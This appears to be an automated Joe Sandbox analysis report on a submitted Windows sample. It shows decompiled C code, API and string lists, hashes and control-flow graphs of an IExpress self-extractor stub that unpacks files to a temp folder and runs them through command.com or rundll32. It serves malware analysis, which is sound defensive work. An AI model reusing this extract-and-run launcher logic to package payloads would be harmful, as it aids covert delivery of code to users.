                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                        • Part of subcall function 000E468F: SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                        • Part of subcall function 000E468F: LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                        • Part of subcall function 000E468F: LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                        • Part of subcall function 000E468F: memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                        • Part of subcall function 000E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,000E8C42), ref: 000E3D8F
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 000E3E26
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,000E8C42), ref: 000E3EFF
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,000E8C42), ref: 000E3F1F
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,000E8C42), ref: 000E3F40
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,000E8C42), ref: 000E3F47
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,000E8C42), ref: 000E3F76
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,000E8C42), ref: 000E3F80
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,000E8C42), ref: 000E3FC2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                      • API String ID: 1032054927-3362248971
                                                                                                                                                                                                      • Opcode ID: 0fc0652599166593dc1f00134c6f02e60619a3d2a7c7831407468657eb796e04
                                                                                                                                                                                                      • Instruction ID: 252f14eda7710c08c062f547440d266d7382b88db2616571d081fc51382b59af
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fc0652599166593dc1f00134c6f02e60619a3d2a7c7831407468657eb796e04
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4B1D3706083C19FE7649F26DC8976B7AE4EB85B00F10492DFA95FB291D778C940CB92
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E000E1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v527;
                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                      				char _v1552;
                                                                                                                                                                                                      				CHAR* _v1556;
                                                                                                                                                                                                      				int* _v1560;
                                                                                                                                                                                                      				CHAR** _v1564;
void* __ebx;
void* __edi;
void* __esi;
signed int _t48;
CHAR* _t53;
CHAR* _t54;
char* _t57;
char* _t58;
CHAR* _t60;
void* _t62;
signed char _t65;
intOrPtr _t76;
intOrPtr _t77;
unsigned int _t85;
CHAR* _t90;
CHAR* _t92;
char _t105;
char _t106;
CHAR** _t111;
CHAR* _t115;
intOrPtr* _t125;
void* _t126;
CHAR* _t132;
CHAR* _t135;
void* _t138;
void* _t139;
void* _t145;
intOrPtr* _t146;
char* _t148;
CHAR* _t151;
void* _t152;
CHAR* _t155;
CHAR* _t156;
void* _t157;
signed int _t158;

_t48 =  *0xe8004; // 0xb7c20988
_v8 = _t48 ^ _t158;
_t108 = __ecx;
_v1564 = _a4;
_v1560 = _a8;
E000E1680( &_v528, 0x104, __ecx);
if(_v528 != 0x22) {
	_t135 = " ";
	_t53 =  &_v528;
} else {
	_t135 = "\"";
	_t53 =  &_v527;
}
_t111 =  &_v1556;
_v1556 = _t53;
_t54 = E000E1A84(_t111, _t135);
_t156 = _v1556;
_t151 = _t54;
if(_t156 == 0) {
	L12:
	_push(_t111);
	E000E1781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
	E000E658A( &_v268, 0x104, _t156);
	goto L13;
} else {
	_t132 = _t156;
	_t148 =  &(_t132[1]);
	do {
		_t105 =  *_t132;
		_t132 =  &(_t132[1]);
	} while (_t105 != 0);
	_t111 = _t132 - _t148;
	if(_t111 < 3) {
		goto L12;
	}
	_t106 = _t156[1];
	if(_t106 != 0x3a || _t156[2] != 0x5c) {
		if( *_t156 != 0x5c || _t106 != 0x5c) {
			goto L12;
		} else {
			goto L11;
		}
	} else {
		L11:
		E000E1680( &_v268, 0x104, _t156);
		L13:
		_t138 = 0x2e;
		_t57 = E000E66C8(_t156, _t138);
		if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
			_t139 = 0x2e;
			_t115 = _t156;
			_t58 = E000E66C8(_t115, _t139);
			if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
				_t156 = LocalAlloc(0x40, 0x400);
				if(_t156 == 0) {
					goto L43;
				}
				_t65 = GetFileAttributesA( &_v268); // executed
				if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
					E000E1680( &_v1552, 0x400, _t108);
				} else {
					_push(_t115);
					_t108 = 0x400;
					E000E1781( &_v1552, 0x400, _t115,  &_v268);
					if(_t151 != 0 &&  *_t151 != 0) {
						E000E16B3( &_v1552, 0x400, " ");
						E000E16B3( &_v1552, 0x400, _t151);
					}
				}
				_t140 = _t156;
				 *_t156 = 0;
				E000E2AAC( &_v1552, _t156, _t156);
				goto L53;
			} else {
				_t108 = "Command.com /c %s";
				_t125 = "Command.com /c %s";
				_t145 = _t125 + 1;
				do {
					_t76 =  *_t125;
					_t125 = _t125 + 1;
				} while (_t76 != 0);
				_t126 = _t125 - _t145;
				_t146 =  &_v268;
				_t157 = _t146 + 1;
				do {
					_t77 =  *_t146;
					_t146 = _t146 + 1;
				} while (_t77 != 0);
				_t140 = _t146 - _t157;
				_t154 = _t126 + 8 + _t146 - _t157;
				_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
				if(_t156 != 0) {
					E000E171E(_t156, _t154, "Command.com /c %s",  &_v268);
					goto L53;
				}
				goto L43;
			}
		} else {
			_t85 = GetFileAttributesA( &_v268);
			if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
				_t140 = 0x525;
				_push(0);
				_push(0x10);
				_push(0);
				_t60 =  &_v268;
				goto L35;
			} else {
				_t140 = "[";
				_v1556 = _t151;
				_t90 = E000E1A84( &_v1556, "[");
				if(_t90 != 0) {
					if( *_t90 != 0) {
						_v1556 = _t90;
					}
					_t140 = "]";
					E000E1A84( &_v1556, "]");
				}
				_t156 = LocalAlloc(0x40, 0x200);
				if(_t156 == 0) {
					L43:
					_t60 = 0;
					_t140 = 0x4b5;
					_push(0);
					_push(0x10);
					_push(0);
					L35:
					_push(_t60);
					E000E44B9(0, _t140);
                                                                                                                                                                                                      									_t62 = 0;
                                                                                                                                                                                                      									goto L54;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t155 = _v1556;
                                                                                                                                                                                                      									_t92 = _t155;
                                                                                                                                                                                                      									if( *_t155 == 0) {
                                                                                                                                                                                                      										_t92 = "DefaultInstall";
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									 *0xe9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                      									 *_v1560 = 1;
                                                                                                                                                                                                      									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xe1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                      										 *0xe9a34 =  *0xe9a34 & 0xfffffffb;
                                                                                                                                                                                                      										if( *0xe9a40 != 0) {
                                                                                                                                                                                                      											_t108 = "setupapi.dll";
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t108 = "setupx.dll";
                                                                                                                                                                                                      											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_push( &_v268);
                                                                                                                                                                                                      										_push(_t155);
                                                                                                                                                                                                      										E000E171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										 *0xe9a34 =  *0xe9a34 | 0x00000004;
                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										E000E1680(_t108, 0x104, _t155);
                                                                                                                                                                                                      										_t140 = 0x200;
                                                                                                                                                                                                      										E000E1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L53:
                                                                                                                                                                                                      									_t62 = 1;
                                                                                                                                                                                                      									 *_v1564 = _t156;
                                                                                                                                                                                                      									L54:
                                                                                                                                                                                                      									_pop(_t152);
                                                                                                                                                                                                      									return E000E6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}
                                                                                                                                                                                                      0x000e1d5e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1c1b
                                                                                                                                                                                                      0x000e1c1b
                                                                                                                                                                                                      0x000e1c20
                                                                                                                                                                                                      0x000e1c2c
                                                                                                                                                                                                      0x000e1c33
                                                                                                                                                                                                      0x000e1c38
                                                                                                                                                                                                      0x000e1c3a
                                                                                                                                                                                                      0x000e1c3a
                                                                                                                                                                                                      0x000e1c40
                                                                                                                                                                                                      0x000e1c4b
                                                                                                                                                                                                      0x000e1c4b
                                                                                                                                                                                                      0x000e1c5d
                                                                                                                                                                                                      0x000e1c61
                                                                                                                                                                                                      0x000e1dd4
                                                                                                                                                                                                      0x000e1dd4
                                                                                                                                                                                                      0x000e1dd6
                                                                                                                                                                                                      0x000e1ddb
                                                                                                                                                                                                      0x000e1ddc
                                                                                                                                                                                                      0x000e1dde
                                                                                                                                                                                                      0x000e1d64
                                                                                                                                                                                                      0x000e1d64
                                                                                                                                                                                                      0x000e1d67
                                                                                                                                                                                                      0x000e1d6c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1c67
                                                                                                                                                                                                      0x000e1c67
                                                                                                                                                                                                      0x000e1c6d
                                                                                                                                                                                                      0x000e1c72
                                                                                                                                                                                                      0x000e1c74
                                                                                                                                                                                                      0x000e1c74
                                                                                                                                                                                                      0x000e1c8e
                                                                                                                                                                                                      0x000e1c99
                                                                                                                                                                                                      0x000e1cc0
                                                                                                                                                                                                      0x000e1cf8
                                                                                                                                                                                                      0x000e1d07
                                                                                                                                                                                                      0x000e1d23
                                                                                                                                                                                                      0x000e1d09
                                                                                                                                                                                                      0x000e1d14
                                                                                                                                                                                                      0x000e1d1b
                                                                                                                                                                                                      0x000e1d1b
                                                                                                                                                                                                      0x000e1d2b
                                                                                                                                                                                                      0x000e1d2d
                                                                                                                                                                                                      0x000e1d2d
                                                                                                                                                                                                      0x000e1d38
                                                                                                                                                                                                      0x000e1d39
                                                                                                                                                                                                      0x000e1d46
                                                                                                                                                                                                      0x000e1cc2
                                                                                                                                                                                                      0x000e1cc2
                                                                                                                                                                                                      0x000e1ccc
                                                                                                                                                                                                      0x000e1cce
                                                                                                                                                                                                      0x000e1cce
                                                                                                                                                                                                      0x000e1cdb
                                                                                                                                                                                                      0x000e1ce6
                                                                                                                                                                                                      0x000e1cee
                                                                                                                                                                                                      0x000e1cee
                                                                                                                                                                                                      0x000e1e89
                                                                                                                                                                                                      0x000e1e91
                                                                                                                                                                                                      0x000e1e92
                                                                                                                                                                                                      0x000e1e94
                                                                                                                                                                                                      0x000e1e97
                                                                                                                                                                                                      0x000e1ea4
                                                                                                                                                                                                      0x000e1ea4
                                                                                                                                                                                                      0x000e1c61
                                                                                                                                                                                                      0x000e1c07
                                                                                                                                                                                                      0x000e1bd3
                                                                                                                                                                                                      0x000e1b7b

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 000E1BE7
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 000E1BFE
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 000E1C57
                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 000E1C88
                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,000E1140,00000000,00000008,?), ref: 000E1CB8
                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32 ref: 000E1D1B
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                      • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                      • API String ID: 383838535-2835489207
                                                                                                                                                                                                      • Opcode ID: b23e0568d7875ca5302575ba3143a622640f0be88d1cebe6eb23d9144089926e
                                                                                                                                                                                                      • Instruction ID: 8ee8346b2cc67dd97991b96d377cd021a6dfaab0ae3509bd3bc147b86259e351
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b23e0568d7875ca5302575ba3143a622640f0be88d1cebe6eb23d9144089926e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75A197B0A042C86FEB609B26CC44FEA73A9DB85310F1402A9F595F72C1DBB49EC5CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 450 e2f1d-e2f3d 451 e2f3f-e2f46 450->451 452 e2f6c-e2f73 call e5164 450->452 454 e2f5f-e2f66 call e3a3f 451->454 455 e2f48 call e51e5 451->455 460 e2f79-e2f80 call e55a0 452->460 461 e3041 452->461 454->452 454->461 462 e2f4d-e2f4f 455->462 460->461 468 e2f86-e2fbe GetSystemDirectoryA call e658a LoadLibraryA 460->468 464 e3043-e3053 call e6ce0 461->464 462->461 465 e2f55-e2f5d 462->465 465->452 465->454 472 e2ff7-e3004 FreeLibrary 468->472 473 e2fc0-e2fd4 GetProcAddress 468->473 474 e3006-e300c 472->474 475 e3017-e3024 SetCurrentDirectoryA 472->475 473->472 476 e2fd6-e2fee DecryptFileA 473->476 474->475 477 e300e call e621e 474->477 478 e3026-e303c call e44b9 call e6285 475->478 479 e3054-e305a 475->479 476->472 485 e2ff0-e2ff5 476->485 489 e3013-e3015 477->489 478->461 480 e305c call e3b26 479->480 481 e3065-e306c 479->481 491 e3061-e3063 480->491 487 e306e-e3075 call e256d 481->487 488 e307c-e3089 481->488 485->472 496 e307a 487->496 493 e308b-e3091 488->493 494 e30a1-e30a9 488->494 489->461 489->475 491->461 491->481 493->494 497 e3093 call e3ba2 493->497 499 e30ab-e30ad 494->499 500 e30b4-e30b7 494->500 496->488 504 e3098-e309a 497->504 499->500 501 e30af call e4169 499->501 500->464 501->500 504->461 505 e309c 504->505 505->494
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E000E2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v272;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				signed int _t22;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      				intOrPtr* _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t47;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t59;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t43 = __edx;
                                                                                                                                                                                                      				_t9 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                      				if( *0xe8a38 != 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					_t11 = E000E5164(_t52);
                                                                                                                                                                                                      					_t53 = _t11;
                                                                                                                                                                                                      					if(_t11 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_t12 = 0;
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						return E000E6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t14 = E000E55A0(_t53); // executed
                                                                                                                                                                                                      					if(_t14 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t45 = 0x105;
                                                                                                                                                                                                      						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                      						_t43 = 0x105;
                                                                                                                                                                                                      						_t40 =  &_v272;
                                                                                                                                                                                                      						E000E658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                      						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                      						_t44 = 0;
                                                                                                                                                                                                      						if(_t36 != 0) {
                                                                                                                                                                                                      							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                      							_v276 = _t31;
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								_t45 = _t47;
                                                                                                                                                                                                      								_t40 = _t31;
                                                                                                                                                                                                      								 *0xea288("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\", 0); // executed
                                                                                                                                                                                                      								_v276();
                                                                                                                                                                                                      								if(_t47 != _t47) {
                                                                                                                                                                                                      									_t40 = 4;
                                                                                                                                                                                                      									asm("int 0x29");
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						FreeLibrary(_t36);
                                                                                                                                                                                                      						_t58 =  *0xe8a24 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t58 != 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\"); // executed
                                                                                                                                                                                                      							if(_t21 != 0) {
                                                                                                                                                                                                      								__eflags =  *0xe8a2c - _t44; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                      									__eflags =  *0xe8d48 & 0x000000c0;
                                                                                                                                                                                                      									if(( *0xe8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                      										_t41 =  *0xe9a40; // 0x3, executed
                                                                                                                                                                                                      										_t26 = E000E256D(_t41); // executed
                                                                                                                                                                                                      										_t44 = _t26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t22 =  *0xe8a24; // 0x0
                                                                                                                                                                                                      									 *0xe9a44 = _t44;
                                                                                                                                                                                                      									__eflags = _t22;
                                                                                                                                                                                                      									if(_t22 != 0) {
                                                                                                                                                                                                      										L26:
                                                                                                                                                                                                      										__eflags =  *0xe8a38;
                                                                                                                                                                                                      										if( *0xe8a38 == 0) {
                                                                                                                                                                                                      											__eflags = _t22;
                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                      												E000E4169(__eflags);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t12 = 1;
                                                                                                                                                                                                      										goto L17;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags =  *0xe9a30 - _t22; // 0x0
                                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                                      											goto L26;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t25 = E000E3BA2(); // executed
                                                                                                                                                                                                      										__eflags = _t25;
                                                                                                                                                                                                      										if(_t25 == 0) {
                                                                                                                                                                                                      											goto L16;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t22 =  *0xe8a24; // 0x0
                                                                                                                                                                                                      										goto L26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t27 = E000E3B26(_t40, _t44);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t43 = 0x4bc;
                                                                                                                                                                                                      							E000E44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                      							 *0xe9124 = E000E6285();
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t59 =  *0xe9a30 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t59 != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E000E621E(); // executed
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t49 =  *0xe8a24;
                                                                                                                                                                                                      				if( *0xe8a24 != 0) {
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					_t34 = E000E3A3F(_t51);
                                                                                                                                                                                                      					_t52 = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E000E51E5(_t49) == 0) {
                                                                                                                                                                                                      					goto L16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t51 =  *0xe8a38;
                                                                                                                                                                                                      				if( *0xe8a38 != 0) {
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L4;
                                                                                                                                                                                                      			}




























                                                                                                                                                                                                      0x000e2fee
                                                                                                                                                                                                      0x000e2ff0
                                                                                                                                                                                                      0x000e2ff5
                                                                                                                                                                                                      0x000e2ff5
                                                                                                                                                                                                      0x000e2fee
                                                                                                                                                                                                      0x000e2fd4
                                                                                                                                                                                                      0x000e2ff8
                                                                                                                                                                                                      0x000e2ffe
                                                                                                                                                                                                      0x000e3004
                                                                                                                                                                                                      0x000e3017
                                                                                                                                                                                                      0x000e301c
                                                                                                                                                                                                      0x000e3024
                                                                                                                                                                                                      0x000e3054
                                                                                                                                                                                                      0x000e305a
                                                                                                                                                                                                      0x000e3065
                                                                                                                                                                                                      0x000e3065
                                                                                                                                                                                                      0x000e306c
                                                                                                                                                                                                      0x000e306e
                                                                                                                                                                                                      0x000e3075
                                                                                                                                                                                                      0x000e307a
                                                                                                                                                                                                      0x000e307a
                                                                                                                                                                                                      0x000e307c
                                                                                                                                                                                                      0x000e3081
                                                                                                                                                                                                      0x000e3087
                                                                                                                                                                                                      0x000e3089
                                                                                                                                                                                                      0x000e30a1
                                                                                                                                                                                                      0x000e30a1
                                                                                                                                                                                                      0x000e30a9
                                                                                                                                                                                                      0x000e30ab
                                                                                                                                                                                                      0x000e30ad
                                                                                                                                                                                                      0x000e30af
                                                                                                                                                                                                      0x000e30af
                                                                                                                                                                                                      0x000e30ad
                                                                                                                                                                                                      0x000e30b6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e308b
                                                                                                                                                                                                      0x000e308b
                                                                                                                                                                                                      0x000e3091
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3093
                                                                                                                                                                                                      0x000e3098
                                                                                                                                                                                                      0x000e309a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e309c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e309c
                                                                                                                                                                                                      0x000e3089
                                                                                                                                                                                                      0x000e305c
                                                                                                                                                                                                      0x000e3061
                                                                                                                                                                                                      0x000e3063
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3063
                                                                                                                                                                                                      0x000e302b
                                                                                                                                                                                                      0x000e3032
                                                                                                                                                                                                      0x000e303c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e303c
                                                                                                                                                                                                      0x000e3006
                                                                                                                                                                                                      0x000e300c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e300e
                                                                                                                                                                                                      0x000e3015
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3015
                                                                                                                                                                                                      0x000e2f80
                                                                                                                                                                                                      0x000e2f3f
                                                                                                                                                                                                      0x000e2f46
                                                                                                                                                                                                      0x000e2f5f
                                                                                                                                                                                                      0x000e2f5f
                                                                                                                                                                                                      0x000e2f64
                                                                                                                                                                                                      0x000e2f66
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2f66
                                                                                                                                                                                                      0x000e2f4f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2f55
